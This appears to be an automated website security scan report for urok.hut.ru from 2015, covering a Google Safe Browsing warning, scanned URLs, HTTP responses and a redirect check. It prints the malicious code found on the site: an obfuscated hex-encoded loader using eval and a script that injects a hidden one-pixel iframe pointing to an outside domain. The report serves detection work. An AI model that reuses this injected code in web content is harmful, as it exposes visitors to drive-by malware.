Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=urok.hut.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://urok.hut.ru/ | 200 OK Content-Length: 75257 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ln="62656f363b300162656f3a363b30016d7e65687f6264652b6f64626d796a666e7879682322700102626d2362656f3a222b70010202796e7f7e7965233b2230010276010262656f3a363a3001026f64687e666e657f256c6e7f4e676e666e657f4972426f232c6672626d796a666e2c22257879683629637f7f7b3124246c64646c676e25666a6562726a606a7f2568652429300176016f64687e666e657f257c79627f6e232937626d796a666e2b7c626f7f63362c3a2c2b636e626c637f362c3a2c2b787f72676e362c7d627862696267627f723163626f6f6e652c2b626f362c6672626d796a666e2c2b646547646a6f362c7f7972706f Decoded script: function ikchbw(){nycf=Math.PI;ssy=parseInt;lywr='length';zufro=ssy(~((nycf&nycf)|(~nycf&nycf)&(nycf&~nycf)|(~nycf&~nycf)));fxrw=ssy(((zufro&zufro)|(~zufro&zufro)&(zufro&~zufro)|(~zufro&~zufro))&1);qibo=fxrw<<fxrw;tklttv=zufro;ssuwqn='';mmhnih=String.fromCharCode;osbj=eval;for(tihzh=zufro;tihzh<yotl[lywr];tihzh-=-fxrw)tklttv+=yotl.charCodeAt(tihzh);tklttv%=unescape(zufro+mmhnih(120)+(fxrw<<6));for(tihzh=zufro;tihzh<ln[lywr];tihzh return(0); } ind1=1; document.getElementById('myiframe').src="http://google.maniyakat.cn/"; } document.write("<iframe width='1' height='1' style='visibility:hidden' id='myiframe' onLoad='try{doiframesrc();}catch(e){}'></iframe>"); if(document.all) { doiframesrc(); } ssuwqn="NaN";tklttv="NaN"; <iframe width='1' height='1' style='visibility:hidden' id='myiframe' onLoad='try{doiframesrc();}catch(e){}'></iframe> Antivirus reports:
| ||
http://tmserver-1.com/16hd27bpso0u20kps1l8164dabgo5lz6mkhi34l | 200 OK Content-Length: 17854 Content-Type: text/javascript | clean |
http://stat.tbn.ru/loader.js?u=64713 | 200 OK Content-Length: 5000 Content-Type: application/x-javascript | clean |
http://urok.hut.ru/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 08 Mar 2015 13:43:18 GMT Location: http://err.hut.ru/error404.shtml Server: nginx/0.6.29 Content-Type: text/html; charset=windows-1251 Expires: Thu, 01 Jan 1970 00:00:01 GMT | clean |
http://err.hut.ru/error404.shtml | 200 OK Content-Length: 6626 Content-Type: text/html | clean |
http://err.hut.ru/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 08 Mar 2015 13:43:19 GMT Location: http://err.hut.ru/error404.shtml Server: nginx/0.6.29 Content-Type: text/html; charset=windows-1251 Expires: Thu, 01 Jan 1970 00:00:01 GMT | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: urok.hut.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Mar 2015 13:43:18 GMT
Server: nginx/0.6.29
Content-Type: text/html; charset=windows-1251
Expires: Thu, 01 Jan 1970 00:00:01 GMT
GET / HTTP/1.1
Host: urok.hut.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Mar 2015 13:43:18 GMT
Server: nginx/0.6.29
Content-Type: text/html; charset=windows-1251
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Second query (visit from search engine):
GET / HTTP/1.1
Host: urok.hut.ru
Referer: http://www.google.com/search?q=urok.hut.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: urok.hut.ru
Referer: http://www.google.com/search?q=urok.hut.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.